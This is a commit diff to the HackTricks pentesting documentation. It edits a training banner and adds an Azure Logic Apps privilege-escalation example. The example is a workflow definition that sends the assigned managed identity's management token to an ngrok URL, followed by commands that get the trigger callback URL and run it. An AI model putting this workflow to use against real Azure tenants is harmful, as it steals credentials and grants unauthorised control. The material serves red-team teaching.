improvements

Author: carlospolop

src/banners/hacktricks-training.md

@@ -1,6 +1,6 @@
 > [!TIP]
 > Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
-> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
+> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
 > Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
 >
 > <details>

src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md

@@ -26,7 +26,50 @@ az logic workflow update \
   --definition <workflow_definition_file.json>
 ```
 
-And after changing it, you can run it with:
+Example definition of workflow with manual trigger to steal a management token of an assigned identity listeningn in a ngrok URL:
+
+```json
+{
+  "definition": {
+    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowDefinition.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {},
+    "triggers": {
+      "manual": {
+        "type": "Request",
+        "kind": "Http",
+        "inputs": { "schema": {} }
+      }
+    },
+    "actions": {
+      "GetSecret": {
+        "type": "Http",
+        "inputs": {
+          "method": "GET",
+          "uri": "https://82fa-81-33-67-18.ngrok-free.app",
+          "authentication": {
+            "type": "ManagedServiceIdentity",
+            "audience": "https://management.azure.com/",
+            "identity": "/subscriptions/0c7db2d7-90ba-4106-8610-cdd8c06971fe/resourceGroups/-rg-10b8e451/providers/Microsoft.ManagedIdentity/userAssignedIdentities/uai-10b8e451",
+          }
+        }
+      },
+      "Respond": {
+        "type": "Response",
+        "runAfter": { "GetSecret": ["Succeeded"] },
+        "inputs": {
+          "statusCode": 200,
+          "body": "@body('GetSecret')"
+        }
+      }
+    },
+    "outputs": {}
+  },
+  "parameters": {}
+}
+```
+
+And after modifying it, you can run it with:
 
 ```bash
 az rest \
@@ -36,9 +79,19 @@ az rest \
   --headers "Content-Type=application/json"
 ```
 
+OIf there is a manual trigger, you can get the callback URL and run it:
+
+```bash
+az rest --method POST \
+  --url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<rg-name>>/providers/Microsoft.Logic/workflows/<workflow-name>>/triggers/manual/listCallbackUrl?api-version=2019-05-01" \
+  --query "value" -o tsv
+
+curl -X POST "https://prod-11.centralus.logic.azure.com:443/workflows/02f4e715c50a42c58b683629ddb889f5/triggers/manual/paths/invoke?api-version=2019-05-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=5m1THJOCzEl6WoZyaont4i2A62PpSZhK3BtVAzYYTPY"
+```
+
 ### Microsoft.Logic/workflows/write
 
-With just this permission it's possible tochange the Authorization Policy, giving for example another tenant the capability to trigger the workflow:
+With just this permission it's possible to change the Authorization Policy, giving for example another tenant the capability to trigger the workflow:
 
 ```bash
 az rest --method PUT \